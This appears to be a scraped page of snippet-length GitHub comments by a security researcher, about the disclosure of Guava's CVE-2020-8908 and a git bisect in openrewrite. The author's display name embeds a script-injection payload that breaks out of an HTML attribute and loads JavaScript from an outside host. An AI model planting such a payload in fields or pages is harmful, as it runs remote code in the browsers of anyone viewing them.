Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Stating that I was going to file a formal appeal to MITRE finally got action on behalf of Google. They have assigned CVE-2020-8908 which should be disclosed later this week.

@tony-- you are correct. Updating to Guava 30.0 won't fix this either. All that 30.0 changes is marking the method as deprecated. #5324 is a fix for it, but it's...

I've sent the following message to the Google security team. > Hi Google Team, > > The CVE description states the following: https://nvd.nist.gov/vuln/detail/CVE-2020-8908 > > > We recommend updating Guava...

Wow, this is more than I expected out of this. Thank you for the kind, respectful, and very human apology here. I really honestly do appreciate it. > Additionally, you...

Quick update to everyone following this. I added a "workaround" section to the header of this document. I realized that was missing. Sorry about that. > This vulnerability can be...

> And if anything, I would suspect that our method's behavior is more likely to cause end users trouble on Android (where other apps can see the files, IIUC) than...

Doing a git bisect, this was broken by fd3af4575a21f5c2c797e6520f45d99c0b4fb6c1

@jkschneider take a look here: https://github.com/openrewrite/rewrite/commit/fd3af4575a21f5c2c797e6520f45d99c0b4fb6c1#diff-f0e640936ef78172647e50cdf866de2f5f97408c703dddcf6f2c2576814919e2R50-R58

So, although this does fix this particular issue, it does look like the problem flagged by this test is legitimate and should be fixed irrespective of the changes in this...

test